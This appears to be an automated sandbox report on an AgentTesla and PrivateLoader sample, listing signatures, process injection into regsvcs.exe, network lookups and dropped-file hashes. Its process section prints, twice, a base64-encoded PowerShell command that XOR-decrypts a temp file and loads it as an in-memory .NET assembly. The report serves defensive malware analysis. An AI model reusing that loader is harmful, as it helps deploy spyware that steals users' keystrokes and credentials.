Malware Analysis Report

2025-01-02 07:37

Sample ID 240510-bq4phaae4v
Target 3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924
SHA256 3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924
Tags
agenttesla execution keylogger spyware stealer trojan privateloader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924

Threat Level: Known bad

The file 3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924 was found to be: Known bad.

Malicious Activity Summary

agenttesla execution keylogger spyware stealer trojan privateloader

Privateloader family

AgentTesla

Suspicious use of SetThreadContext

Unsigned PE

Command and Scripting Interpreter: PowerShell

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 01:22

Signatures

Privateloader family

privateloader

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 01:21

Reported

2024-05-10 01:24

Platform

win7-20240419-en

Max time kernel

118s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe

"C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-10 01:21

Reported

2024-05-10 01:24

Platform

win10v2004-20240508-en

Max time kernel

93s

Max time network

99s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1124 set thread context of 4764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1328 wrote to memory of 4144 | N/A | C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe | C:\Windows\system32\cmd.exe
PID 1328 wrote to memory of 4144 | N/A | C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe | C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 1124 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4144 wrote to memory of 1124 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1124 wrote to memory of 4764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1124 wrote to memory of 4764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1124 wrote to memory of 4764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1124 wrote to memory of 4764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1124 wrote to memory of 4764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1124 wrote to memory of 4764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1124 wrote to memory of 4764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1124 wrote to memory of 4764 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe

"C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgAkAGYAaQBsAGUAUABhAHQAaAAgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGwANgBnADUAaAA5AHEANQBqAC4AdABtAHAAJwA7AAoAJABlAG4AYwByAHkAcAB0AGUAZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAGYAaQBsAGUAUABhAHQAaAApADsACgAkAGQAZQBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAYgB5AHQAZQBbAF0AIAAkAGUAbgBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwAuAEwAZQBuAGcAdABoADsACgAkAGsAZQB5ACAAPQAgACIAZQA3AGUAYQA2ADAAZABlAGUAMQA0ADEANAAyAGYANwA5ADIAMgBiADgAYQA0ADQAZgA4AGMAYgA4ADUAYwBkACIAOwAKACQAawBlAHkASQBuAGQAZQB4ACAAPQAgADAAOwAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7AAoAIAAgACAAIAAkAGQAZQBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwBbACQAaQBdACAAPQAgAFsAYgB5AHQAZQBdACgAJABlAG4AYwByAHkAcAB0AGUAZABCAHkAdABlAHMAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGsAZQB5AEkAbgBkAGUAeABdACkAOwAKACAAIAAgACAAJABrAGUAeQBJAG4AZABlAHgAIAA9ACAAKAAkAGsAZQB5AEkAbgBkAGUAeAAgACsAIAAxACkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoADsACgB9AAoAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAZABlAGMAcgB5AHAAdABlAGQAQgB5AHQAZQBzACkAOwAKACQAZQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAZQBuAHQAcgB5AFAAbwBpAG4AdAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQA7AAoA"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -EncodedCommand CgAkAGYAaQBsAGUAUABhAHQAaAAgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGwANgBnADUAaAA5AHEANQBqAC4AdABtAHAAJwA7AAoAJABlAG4AYwByAHkAcAB0AGUAZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAGYAaQBsAGUAUABhAHQAaAApADsACgAkAGQAZQBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAYgB5AHQAZQBbAF0AIAAkAGUAbgBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwAuAEwAZQBuAGcAdABoADsACgAkAGsAZQB5ACAAPQAgACIAZQA3AGUAYQA2ADAAZABlAGUAMQA0ADEANAAyAGYANwA5ADIAMgBiADgAYQA0ADQAZgA4AGMAYgA4ADUAYwBkACIAOwAKACQAawBlAHkASQBuAGQAZQB4ACAAPQAgADAAOwAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7AAoAIAAgACAAIAAkAGQAZQBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwBbACQAaQBdACAAPQAgAFsAYgB5AHQAZQBdACgAJABlAG4AYwByAHkAcAB0AGUAZABCAHkAdABlAHMAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGsAZQB5AEkAbgBkAGUAeABdACkAOwAKACAAIAAgACAAJABrAGUAeQBJAG4AZABlAHgAIAA9ACAAKAAkAGsAZQB5AEkAbgBkAGUAeAAgACsAIAAxACkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoADsACgB9AAoAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAZABlAGMAcgB5AHAAdABlAGQAQgB5AHQAZQBzACkAOwAKACQAZQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAZQBuAHQAcgB5AFAAbwBpAG4AdAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQA7AAoA

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp
NL | 23.62.61.194:443 | www.bing.com | tcp
US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp

Files

memory/1124-2-0x00007FFDAE003000-0x00007FFDAE005000-memory.dmp

memory/1124-12-0x000001CD200D0000-0x000001CD200F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wvqjz5gp.kre.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1124-13-0x00007FFDAE000000-0x00007FFDAEAC1000-memory.dmp

memory/1124-14-0x00007FFDAE000000-0x00007FFDAEAC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\file-l6g5h9q5j.tmp

MD5 4956267245911f00d2153d7bb09e3968
SHA1 78fe367a3195099fd5919f9ab85472cbb0036835
SHA256 6163e0f2a5b2b3646e30110b41a465811341d8f4d8b1447f4229f5c817e898ff
SHA512 46b3c2f4e248602cff5c6dcffe994ff029774240a6de98f341fd07c66a8001ccb23d67534d6b78b2f8a0eccded4241c6e8085d6ae8163be5ca189b1a92c82fb8

memory/1124-16-0x000001CD200C0000-0x000001CD200CA000-memory.dmp

memory/1124-17-0x000001CD204D0000-0x000001CD20564000-memory.dmp

memory/1124-18-0x00007FFDAE000000-0x00007FFDAEAC1000-memory.dmp

memory/4764-19-0x0000000000400000-0x0000000000442000-memory.dmp

memory/4764-20-0x00000000057E0000-0x0000000005D84000-memory.dmp

memory/4764-21-0x0000000005230000-0x0000000005296000-memory.dmp

memory/1124-22-0x00007FFDAE000000-0x00007FFDAEAC1000-memory.dmp

memory/4764-23-0x0000000006010000-0x0000000006060000-memory.dmp

memory/4764-24-0x0000000006100000-0x0000000006192000-memory.dmp

memory/4764-25-0x00000000060A0000-0x00000000060AA000-memory.dmp